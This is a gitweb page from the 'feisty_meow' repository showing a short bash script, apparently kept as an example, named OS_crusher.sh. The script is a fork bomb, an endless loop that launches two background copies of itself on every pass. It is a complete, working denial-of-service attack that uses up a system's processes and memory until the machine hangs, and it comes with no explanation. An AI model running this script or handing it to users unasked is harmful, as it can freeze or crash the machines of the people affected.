projects
/
feisty_meow.git
/ blob
commit
grep
author
committer
pickaxe
?
search:
re
summary
|
shortlog
|
log
|
commit
|
commitdiff
|
tree
history
|
raw
|
HEAD
back to single level for spaceming all
[feisty_meow.git]
/
infobase
/
examples
/
os_related
/
OS_crusher.sh
1
#!/bin/bash
2
3
while true; do
4
$0 &
5
$0 &
6
done
7